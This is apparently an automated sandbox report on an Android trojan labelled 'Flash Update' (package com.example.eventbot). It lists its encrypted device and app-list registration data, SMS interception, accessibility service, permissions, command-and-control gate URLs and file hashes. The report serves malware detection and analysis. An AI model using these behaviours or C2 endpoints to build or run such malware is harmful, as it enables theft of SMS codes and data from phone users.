com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Creates SMS data (e.g. PDU)Show sources
Source: com.lib;->parseSMS:2862API Call: android.telephony.SmsMessage.createFromPdu
Has permission to read the SMS storageShow sources
Source: submitted apkRequest permission: android.permission.READ_SMS
Has permission to receive SMS in the backgroundShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Monitors incoming SMSShow sources
Source: com.example.eventbot.bootRegistered receiver: android.provider.Telephony.SMS_RECEIVED
Parses SMS data (e.g. originating address)Show sources
Source: com.lib;->parseSMS:2853API Call: android.telephony.SmsMessage.getMessageBody
Source: com.lib;->parseSMS:2859API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: com.lib;->parseSMS:2865API Call: android.telephony.SmsMessage.getMessageBody
Queries a list of installed applicationsShow sources
Source: com.lib;->getAllApps:1742API Call: android.content.pm.PackageManager.getInstalledApplications
Queries stored mail and application accounts (e.g. Gmail or Whatsup)Show sources
Source: com.google.android.gms.common.internal.ClientSettings;->getAccountName:19API Call: android.accounts.Account.name
Source: com.google.android.gms.signin.internal.SignInClientImpl;->zaa:74API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInAccount;->createDefault:9API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInAccount;->createDefault:11API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInOptions;->zad:78API Call: android.accounts.Account.name

Remote Access Functionality:

barindex
Found parser code for incoming SMS (may be used to act on incoming SMS, BOT)Show sources
Source: com.lib;->doSMS:1632API Call: java.lang.String.equals android.provider.Telephony.SMS_RECEIVED

Malware Configuration

No configs have been found

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

android-buttoncam-android

Created / dropped Files

/data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar
File Type:Zip archive data, at least v2.0 to extract
Size (bytes):47169
Entropy (8bit):7.987893198423728
Encrypted:false
MD5:38CA39254F9A46DB520398546DCAF6E6
SHA1:B704089ECD20514CE6674E5C1C93CEF5DF4ECCE9
SHA-256:378DCE8C0A1EA2EA03047F9EAF0C1B410056396F46732F2FACE099DD667DADCC
SHA-512:CFC6972D5C6CEECCCC3AA1BD786199B5AD14C0F6835B9A9072367A6D38575680B572483049F791101E96B41000B24B965A50CD18EDB3DA33709AA9E5818E482C
Malicious:true
Reputation:low
Preview:

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ora.studiolegalebasili.com
31.214.157.6
truefalse
    unknown
    pagead.l.doubleclick.net
    172.217.22.2
    truefalse
      high
      i.ytimg.com
      216.58.207.54
      truefalse
        high
        www.youtube.com
        unknown
        unknownfalse
          high
          ora.carlaarrabitoarchitetto.com
          unknown
          unknowntrue
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_candroidfalse
              unknown
              http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_candroidfalse
                unknown
                http://schemas.android.com/apk/res/androidcommon_google_signin_btn_icon_light_focused.xml, ic_launcher_foreground.xml, abc_tint_btn_checkable.xml, notification_action_background.xml, abc_screen_simple.xml, abc_search_view.xml, abc_seekbar_thumb_material.xml, abc_action_menu_item_layout.xml, abc_alert_dialog_title_material.xml, abc_screen_simple_overlay_action_mode.xml, abc_alert_dialog_button_bar_material.xml, abc_select_dialog_material.xml, abc_cascading_menu_item_layout.xml, abc_slide_out_bottom.xml, abc_expanded_menu_layout.xmlfalse
                  high
                  http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c;http://ora.carlaarrabitoarchitetto.com/gatandroidfalse
                    unknown
                    http://schemas.android.com/apk/res-autoabc_tint_btn_checkable.xml, abc_select_dialog_material.xmlfalse
                      high
                      http://schemas.android.com/aaptic_launcher_foreground.xmlfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPCountryFlagASNASN NameMalicious
                        216.58.207.54
                        United States
                        15169unknownfalse
                        31.214.157.6
                        Germany
                        58329unknownfalse
                        172.217.22.2
                        United States
                        15169unknownfalse
                        172.217.16.163
                        United States
                        15169unknownfalse
                        172.217.18.100
                        United States
                        15169unknownfalse

                        Static File Info

                        General

                        File type:Zip archive data, at least v2.0 to extract
                        Entropy (8bit):7.717711829277609
                        TrID:
                        • Android Package (19004/1) 46.91%
                        • Java Archive (13504/1) 33.34%
                        • ZIP compressed archive (8000/1) 19.75%
                        File name:bpLldiCjub
                        File size:2002576
                        MD5:f73f66b15791a42dac86d0ced46d660f
                        SHA1:6987f4c7713111355781009e6eeab68d20c43972
                        SHA256:6c0c788eddaf228df9c7f95ced4ea95dcb384b8dabcdd579dedba56915107779
                        SHA512:75dade9dd98dc05cc69c2746beaaab5ac78a5a99544472ba7febbf96855f1a8fefa97c0ebb12ad1868f55c6069bb1346f294b777188449cf69b71d9cdc5cd1b9
                        SSDEEP:24576:T1Cpx0/xJXbttw4pugm12E5f17Ism0XKz7w4joFe01vJYcxdFz3GhUpeaMliQu:TFhbttw4oyE5dbew4y1hYIdh3GhUpeBc
                        File Content Preview:PK........7.\8................AndroidManifest.xml.....Y[lT..=..a........1..1................{.q......E.(.E$....g..|DU....U?.~...T..*.O.....G?h..w...;.....Z3..{......>....j>.TH.....zW....*^....f....n.s.....[......[.D..`.x.<...,.P....../.W@[...m`.x.......8W

                        File Icon

                        Static APK Info

                        General

                        Label:Flash Update
                        Minimum SDK required:21
                        Target SDK required:21
                        Version Code:1
                        Version Name:1
                        Package Name:com.example.eventbot
                        Is Activity:true
                        Is Receiver:true
                        Is Service:true
                        Requests System Level Permissions:false
                        Play Store Compatible:true

                        Activities

                        NameIs Entrypoint
                        com.example.eventbotcom.example.eventbot.activity
                        com.example.eventbotcom.example.eventbot.sendShortMsg
                        com.example.eventbotcom.example.eventbot.MainActivitytrue
                        com.example.eventbotcom.google.android.gms.common.api.GoogleApiActivity

                        Receivers

                        • com.example.eventbot.alarm
                        • com.example.eventbot.boot
                        • Intent: android.intent.action.BOOT_COMPLETED (Priority 999), android.intent.action.REBOOT (Priority 999), android.intent.action.USER_PRESENT (Priority 999), android.intent.action.PACKAGE_ADDED (Priority 999), android.intent.action.PACKAGE_REMOVED (Priority 999), android.provider.Telephony.SMS_RECEIVED (Priority 999), android.intent.action.SCREEN_ON (Priority 999), android.intent.action.EXTERNAL_APPLICATIONS_AVAILABLE (Priority 999), android.net.conn.CONNECTIVITY_CHANGE (Priority 999), android.net.wifi.WIFI_STATE_CHANGED (Priority 999), android.intent.action.DREAMING_STOPPED (Priority 999)
                        • com.example.eventbot.recvLongMsg
                        • Intent: android.provider.Telephony.SMS_DELIVER
                        • com.example.eventbot.recvPushMsg
                        • Intent: android.provider.Telephony.WAP_PUSH_DELIVER
                        • com.example.eventbot.recvShotMsg
                        • Intent: android.provider.Telephony.SMS_RECEIVED (Priority 999)

                        Services

                        • com.example.eventbot.events
                        • Intent: android.accessibilityservice.AccessibilityService (Priority 0)
                        • com.example.eventbot.service
                        • com.example.eventbot.shortMsg
                        • Intent: android.intent.action.RESPOND_VIA_MESSAGE (Priority 0)

                        Permission Requested

                        • android.permission.ACCESS_NETWORK_STATE
                        • android.permission.BIND_ACCESSIBILITY_SERVICE
                        • android.permission.INTERNET
                        • android.permission.READ_EXTERNAL_STORAGE
                        • android.permission.READ_SMS
                        • android.permission.RECEIVE_BOOT_COMPLETED
                        • android.permission.RECEIVE_SMS
                        • android.permission.REQUEST_COMPANION_RUN_IN_BACKGROUND
                        • android.permission.REQUEST_COMPANION_USE_DATA_IN_BACKGROUND
                        • android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
                        • android.permission.REQUEST_INSTALL_PACKAGES
                        • android.permission.SEND_RESPOND_VIA_MESSAGE
                        • android.permission.SYSTEM_ALERT_WINDOW
                        • android.permission.WAKE_LOCK

                        Certificate

                        Name:classes.dex
                        Issuer:1.2.840.113549.1.9.1=#1613616e64726f696440616e64726f69642e636f6d,CN=Android,OU=Android,O=Android,L=Mountain View,ST=California,C=US
                        Subject:1.2.840.113549.1.9.1=#1613616e64726f696440616e64726f69642e636f6d,CN=Android,OU=Android,O=Android,L=Mountain View,ST=California,C=US

                        Resources

                        NameTypeSize
                        common_google_signin_btn_icon_light_focused.xmlDBase 3 data file (892 records)892
                        abc_text_select_handle_right_mtrl_light.pngPNG image, 176 x 88, 8-bit colormap, non-interlaced513
                        abc_btn_switch_to_on_mtrl_00001.9.pngPNG image, 54 x 54, 8-bit gray+alpha, non-interlaced1526
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced253
                        common_google_signin_btn_text_dark_normal_background.9.pngPNG image, 333 x 144, 8-bit/color RGBA, non-interlaced1638
                        abc_ic_menu_selectall_mtrl_alpha.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced262
                        notify_panel_notification_icon_bg.pngPNG image, 14 x 14, 8-bit/color RGB, non-interlaced107
                        notification_bg_normal_pressed.9.pngPNG image, 8 x 8, 8-bit/color RGB, non-interlaced223
                        ic_launcher_background.xmlDBase 3 data file (5696 records)5696
                        ic_launcher_foreground.xmlDBase 3 data file (1696 records)1696
                        select_dialog_multichoice_material.xmlDBase 3 data file (864 records)864
                        abc_btn_switch_to_on_mtrl_00012.9.pngPNG image, 108 x 108, 8-bit gray+alpha, non-interlaced2816
                        abc_ic_clear_material.xmlDBase 3 data file (684 records)684
                        abc_ic_star_half_black_16dp.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced235
                        abc_ic_star_black_48dp.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced467
                        android.arch.core_runtime.versionASCII text6
                        abc_ic_star_half_black_16dp.pngPNG image, 64 x 64, 8-bit gray+alpha, non-interlaced376
                        abc_btn_switch_to_on_mtrl_00012.9.pngPNG image, 27 x 27, 8-bit gray+alpha, non-interlaced825
                        abc_tint_btn_checkable.xmlDBase 3 data file (728 records)728
                        androidx.vectordrawable_vectordrawable-animated.versionASCII text6
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced325
                        abc_ic_star_black_48dp.pngPNG image, 192 x 192, 8-bit gray+alpha, non-interlaced1680
                        abc_textfield_default_mtrl_alpha.9.pngPNG image, 12 x 11, 8-bit gray+alpha, non-interlaced178
                        abc_list_pressed_holo_dark.9.pngPNG image, 12 x 12, 8-bit gray+alpha, non-interlaced209
                        abc_ab_share_pack_mtrl_alpha.9.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced280
                        androidx.localbroadcastmanager_localbroadcastmanager.versionASCII text6
                        common_google_signin_btn_icon_light_normal_background.9.pngPNG image, 73 x 73, 8-bit gray+alpha, non-interlaced683
                        ic_launcher.pngPNG image, 192 x 192, 8-bit/color RGBA, non-interlaced8939
                        notification_action_background.xmlDBase 3 data file (1180 records)1180
                        abc_screen_simple.xmlDBase 3 data file (832 records)832
                        abc_search_view.xmlDBase 3 data file (3472 records)3472
                        abc_scrubber_control_to_pressed_mtrl_000.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced267
                        abc_text_select_handle_middle_mtrl_light.pngPNG image, 30 x 36, 8-bit/color RGBA, non-interlaced396
                        ic_launcher_round.pngPNG image, 48 x 48, 8-bit/color RGBA, non-interlaced2783
                        abc_scrubber_control_to_pressed_mtrl_000.pngPNG image, 12 x 12, 8-bit gray+alpha, non-interlaced145
                        abc_list_selector_disabled_holo_light.9.pngPNG image, 21 x 63, 8-bit gray+alpha, non-interlaced229
                        abc_tint_btn_checkable.xmlDBase 3 data file (624 records)624
                        abc_popup_menu_header_item_layout.xmlDBase 3 data file (848 records)848
                        abc_btn_switch_to_on_mtrl_00001.9.pngPNG image, 108 x 108, 8-bit gray+alpha, non-interlaced2505
                        common_google_signin_btn_text_dark.xmlDBase 3 data file (588 records)588
                        notification_bg_low_pressed.9.pngPNG image, 16 x 16, 8-bit/color RGB, non-interlaced252
                        abc_seekbar_thumb_material.xmlDBase 3 data file (1100 records)1100
                        common_full_open_on_phone.pngPNG image, 128 x 128, 8-bit colormap, non-interlaced489
                        abc_scrubber_track_mtrl_alpha.9.pngPNG image, 20 x 24, 8-bit gray+alpha, non-interlaced198
                        abc_btn_switch_to_on_mtrl_00001.9.pngPNG image, 27 x 27, 8-bit gray+alpha, non-interlaced754
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced492
                        abc_text_select_handle_middle_mtrl_dark.pngPNG image, 40 x 48, 8-bit/color RGBA, non-interlaced583
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 36 x 48, 8-bit gray+alpha, non-interlaced448
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 72 x 96, 8-bit gray+alpha, non-interlaced430
                        abc_list_divider_mtrl_alpha.9.pngPNG image, 1 x 1, 8-bit grayscale, non-interlaced167
                        abc_btn_check_to_on_mtrl_015.pngPNG image, 64 x 64, 8-bit gray+alpha, non-interlaced432
                        abc_tab_indicator_mtrl_alpha.9.pngPNG image, 12 x 12, 8-bit gray+alpha, non-interlaced186
                        abc_edit_text_material.xmlDBase 3 data file (1172 records)1172
                        abc_textfield_activated_mtrl_alpha.9.pngPNG image, 38 x 33, 8-bit gray+alpha, non-interlaced199
                        androidx.viewpager_viewpager.versionASCII text6
                        abc_tint_default.xmlDBase 3 data file (1224 records)1224
                        notify_panel_notification_icon_bg.pngPNG image, 15 x 15, 8-bit/color RGB, non-interlaced98
                        android.arch.lifecycle_livedata-core.versionASCII text6
                        abc_ic_star_half_black_16dp.pngPNG image, 16 x 16, 8-bit gray+alpha, non-interlaced146
                        abc_menu_hardkey_panel_mtrl_mult.9.pngPNG image, 64 x 24, 8-bit gray+alpha, non-interlaced541
                        abc_cab_background_top_material.xmlDBase 3 data file (336 records)336
                        abc_popup_background_mtrl_mult.9.pngPNG image, 96 x 48, 8-bit gray+alpha, non-interlaced1098
                        notification_media_action.xmlDBase 3 data file (564 records)564
                        common_google_signin_btn_icon_dark_normal_background.9.pngPNG image, 96 x 96, 8-bit/color RGBA, non-interlaced1032
                        resources.arscdata395348
                        abc_text_select_handle_right_mtrl_dark.pngPNG image, 88 x 44, 8-bit/color RGBA, non-interlaced319
                        abc_list_selector_disabled_holo_dark.9.pngPNG image, 13 x 41, 8-bit gray+alpha, non-interlaced217
                        abc_action_menu_item_layout.xmlDBase 3 data file (768 records)768
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced400
                        notification_template_big_media_custom.xmlDBase 3 data file (3044 records)3044
                        abc_list_divider_mtrl_alpha.9.pngPNG image, 2 x 2, 8-bit grayscale, non-interlaced171
                        abc_ic_star_black_16dp.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced459
                        abc_btn_radio_to_on_mtrl_000.pngPNG image, 64 x 64, 8-bit gray+alpha, non-interlaced651
                        notification_bg_low_normal.9.pngPNG image, 12 x 12, 8-bit grayscale, non-interlaced212
                        abc_action_bar_up_container.xmlDBase 3 data file (440 records)440
                        switch_thumb_material_light.xmlDBase 3 data file (464 records)464
                        notification_bg_low_normal.9.pngPNG image, 8 x 8, 8-bit grayscale, non-interlaced215
                        CERT.RSAdata1714
